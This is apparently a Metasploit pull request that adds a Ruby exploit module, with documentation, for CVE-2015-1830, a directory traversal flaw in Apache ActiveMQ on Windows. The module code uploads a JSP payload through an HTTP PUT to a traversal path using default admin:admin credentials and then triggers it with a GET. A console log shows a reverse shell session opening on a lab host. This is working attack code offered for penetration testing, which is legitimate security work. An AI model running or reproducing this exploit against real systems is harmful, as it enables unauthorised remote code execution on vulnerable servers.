### PR TITLE
Add apache_activemq_traversal_upload module to /modules/exploits/windows/http/

### DIFF
--- a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
+++ b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
@@ -1,0 +1,91 @@
+## Introduction
+
+A directory traversal vulnerability was discovered in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows. The vulnerability, tracked as CVE-2015-1830, allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.
+
+Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for `/fileserver/..\\admin\\` and process these as requests for `/admin/`. For the PUT request to succeed, credentials need to be provided.
+
+This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/<payload>.jsp` on the target in order to trigger the payload and obtain a shell. The module has been succesfully tested against ActiveMQ 5.11.1 on a Windows 7 machine.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/windows/http/apache_activemq_traversal_upload`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set payload [payload]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Options
+
+1.  `PASSWORD`. The default setting is `admin`.
+2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
+3.  `Proxies`. This option is not set by default.
+4.  `RHOSTS`. To use: `set RHOSTS [IP]`
+5.  `RPORT`. The default setting is `8161`. To use: `set RPORT [PORT]`
+6.  `SSL`. The default setting is `false`.
+7.  `THREADS`. The default setting is `1`.
+8.  `USERNAME`. The default setting is `admin`.
+9.  `VHOST`. This option is not set by default.
+10. `TARGETURI`. This option is the base path. `/` by default.
+
+## Compatible Payloads
+
+0. `generic/custom`
+1. `generic/shell_bind_tcp`
+2. `generic/shell_reverse_tcp`
+3. `java/jsp_shell_bind_tcp`
+4. `java/jsp_shell_reverse_tcp`
+
+## Payload Options
+1. `LHOST`. To use: `set LHOST [IP]`
+2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`
+3. `SHELL`. This option is not set by default.
+
+## Scenarios
+
+```
+msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options
+
+Module options (exploit/windows/http/apache_activemq_traversal_upload):
+
+   Name       Current Setting        Required  Description
+   ----       ---------------        --------  -----------
+   PASSWORD   admin                  yes       Password to authenticate with
+   PATH       /fileserver/..\admin\  yes       Traversal path
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8161                   yes       The target port (TCP)
+   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                      yes       The base path to the web application
+   USERNAME   admin                  yes       Username to authenticate with
+   VHOST                             no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.1:4444 
+[*] Uploading payload...
+[*] Payload sent. Attempting to execute the payload.
+[*] Payload executed!
+[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
+```
+
+## References
+
+1. <https://www.cvedetails.com/cve/CVE-2015-1830/>
+2. <https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt>

--- a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
+++ b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
@@ -8,39 +8,18 @@ This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a ta
 
 ## Verification Steps
 
-1. Install the module as usual
-2. Start msfconsole
-3. Do: `use exploit/windows/http/apache_activemq_traversal_upload`
-4. Do: `set RHOSTS [IP]`
-5. Do: `set payload [payload]`
-6. Do: `set LHOST [IP]`
-7. Do: `exploit`
+1. Start msfconsole.
+2. Do: `use exploit/windows/http/apache_activemq_traversal_upload`.
+3. Do: `set RHOSTS [IP]`. This option is used to set the IP address of the remote system running Apache ActiveMQ.
+4. Do: `set PAYLOAD [payload]`. This option can be used to set the payload to use against the target. The default payload is `java/jsp_shell_reverse_tcp`.
+5. Do: `set LHOST [IP]`. This option is used to set the IP address of the local machine the payload should establish a connection with.
+6. Do: `exploit`.
 
 ## Options
 
-1.  `PASSWORD`. The default setting is `admin`.
+1.  `PASSWORD`. The default setting is `admin`, which is the default password for the ActiveMQ administrator account.
 2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
-3.  `Proxies`. This option is not set by default.
-4.  `RHOSTS`. To use: `set RHOSTS [IP]`
-5.  `RPORT`. The default setting is `8161`. To use: `set RPORT [PORT]`
-6.  `SSL`. The default setting is `false`.
-7.  `THREADS`. The default setting is `1`.
-8.  `USERNAME`. The default setting is `admin`.
-9.  `VHOST`. This option is not set by default.
-10. `TARGETURI`. This option is the base path. `/` by default.
-
-## Compatible Payloads
-
-0. `generic/custom`
-1. `generic/shell_bind_tcp`
-2. `generic/shell_reverse_tcp`
-3. `java/jsp_shell_bind_tcp`
-4. `java/jsp_shell_reverse_tcp`
-
-## Payload Options
-1. `LHOST`. To use: `set LHOST [IP]`
-2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`
-3. `SHELL`. This option is not set by default.
+3.  `USERNAME`. The default setting is `admin`, which is the default ActiveMQ administrator account.
 
 ## Scenarios
 

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache ActiveMQ directory traversal shell upload',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.
+      },
+      'Author'      => 'Erik Wynter', #@wyntererik
+      'References'     =>
+        [
+          [ 'CVE', '2015-1830' ],
+          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
+        ],
+      'Privileged'     => false,
+      'Platform'    => %w{ win },
+      'Targets'     =>
+        [
+          [ 'Windows Java',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Aug 19 2015',
+      'License'        => MSF_LICENSE,
+      'DefaultTarget'  => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+      OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),
+      Opt::RPORT(8161),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
+    ])
+  end
+
+ def check
+    print_status("loaded check")
+    testurl = Rex::Text::rand_text_alpha(10)
+    testcontent = Rex::Text::rand_text_alpha(10)
+
+    send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        },
+      'method'    => 'PUT',
+      'data'      => "<% out.println(\"#{testcontent}\");%>"
+    })
+
+    res1 = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        },
+      'method'    => 'GET'
+    })
+
+    if res1 && res1.body.include?(testcontent)
+      send_request_cgi(
+        opts = {
+          'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
+          'headers'     => {
+            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+            },
+          'method'    => 'DELETE'
+        },
+        timeout = 1
+      )
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Uploading payload...")
+    testurl = Rex::Text::rand_text_alpha(10)
+    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testurl}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        },
+      'method'    => 'PUT',
+      'data'      => payload.encoded
+    })
+    
+    print_status("Payload sent. Attempting to execute the payload.")
+    res1 = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
+      'headers'     => {
+      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      },
+      'method'    => 'GET'
+    })
+    if res1 && res1.code == 200
+      print_good("Payload executed!")
+    else
+      fail_with(Failure::PayloadFailed, "Failed to execute the payload")
+    end
+  end
+end

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -1,9 +1,10 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
 
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'    => 'PUT',
       'data'      => payload.encoded
     })
-    
+
     print_status("Payload sent. Attempting to execute the payload.")
     res1 = send_request_cgi({
       'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -12,7 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
       'Description'    => %q{
-        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.
+        This module exploits a directory traversal vulnerability (CVE-2015-1830) in
+        Apache ActiveMQ 5.x before 5.11.2 for Windows.
+
+        The module tries to upload a JSP payload to the /admin directory via the traversal
+        path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ
+        credentials admin:admin (or other credentials provided by the user). It then issues
+        an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
+        payload and obtain a shell.
       },
       'Author'          =>
         [

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -4,20 +4,25 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Apache ActiveMQ directory traversal shell upload',
+      'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
       'Description'    => %q{
         This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.
       },
-      'Author'      => 'Erik Wynter', #@wyntererik
+      'Author'          =>
+        [
+          'David Jorm',     # Discovery and exploit
+          'Erik Wynter'     # @wyntererik - Metasploit
+        ],
       'References'     =>
         [
           [ 'CVE', '2015-1830' ],
+          [ 'EDB', '40857'],
           [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
         ],
       'Privileged'     => false,
@@ -33,24 +38,27 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Aug 19 2015',
       'License'        => MSF_LICENSE,
+      'DefaultOptions'  => {
+        'RPORT' => 8161,
+        'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
       'DefaultTarget'  => 0))
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
       OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),
-      Opt::RPORT(8161),
       OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
       OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
     ])
   end
 
- def check
-    print_status("loaded check")
-    testurl = Rex::Text::rand_text_alpha(10)
+  def check
+    print_status("Running check...")
+    testfile = Rex::Text::rand_text_alpha(10)
     testcontent = Rex::Text::rand_text_alpha(10)
 
     send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"),
+      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
       'headers'     => {
         'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
         },
@@ -59,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     res1 = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
+      'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
       'headers'     => {
         'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
         },
@@ -69,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res1 && res1.body.include?(testcontent)
       send_request_cgi(
         opts = {
-          'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
+          'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
           'headers'     => {
             'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
             },
@@ -85,11 +93,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("Uploading payload...")
-    testurl = Rex::Text::rand_text_alpha(10)
-    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testurl}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
+    testfile = Rex::Text::rand_text_alpha(10)
+    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
 
-    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"),
+    send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
       'headers'     => {
         'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
         },
@@ -98,14 +106,14 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     print_status("Payload sent. Attempting to execute the payload.")
-    res1 = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
       'headers'     => {
-      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       },
       'method'    => 'GET'
     })
-    if res1 && res1.code == 200
+    if res && res.code == 200
       print_good("Payload executed!")
     else
       fail_with(Failure::PayloadFailed, "Failed to execute the payload")

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
       'Description'    => %q{
-        This module exploits a directory traversal vulnerability (CVE-2015-1830) in
-        Apache ActiveMQ 5.x before 5.11.2 for Windows.
+        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
+        ActiveMQ 5.x before 5.11.2 for Windows.
 
         The module tries to upload a JSP payload to the /admin directory via the traversal
         path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ


### PR DESCRIPTION
## About
This change adds a new module to /modules/exploits/windows/http/ that can be used to exploit a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The change also adds documentation for this module. For more information about this vulnerability, please check the documentation file or [https://www.cvedetails.com/cve/CVE-2015-1830/](url).

## Vulnerable System
Apache ActiveMQ 5.x before 5.11.2 for Windows.

## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/windows/http/apache_activemq_traversal_upload`
4. Do: `set RHOSTS [IP]`
5. Do: `set payload [payload]`
6. Do: `set LHOST [IP]`
7. Do: `exploit`

## Options
1.  `PASSWORD`. The default setting is `admin`.
2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
3.  `Proxies`. This option is not set by default.
4.  `RHOSTS`. To use: `set RHOSTS [IP]`
5.  `RPORT`. The default setting is `8161`. To use: `set RPORT [PORT]`
6.  `SSL`. The default setting is `false`.
7.  `THREADS`. The default setting is `1`.
8.  `USERNAME`. The default setting is `admin`.
9.  `VHOST`. This option is not set by default.
10. `TARGETURI`. This option is the base path. `/` by default.

## Compatible Payloads

0. `generic/custom`
1. `generic/shell_bind_tcp`
2. `generic/shell_reverse_tcp`
3. `java/jsp_shell_bind_tcp`
4. `java/jsp_shell_reverse_tcp`

## Payload Options
1. `LHOST`. To use: `set LHOST [IP]`
2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`
3. `SHELL`. This option is not set by default.

## Scenarios

```
msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
```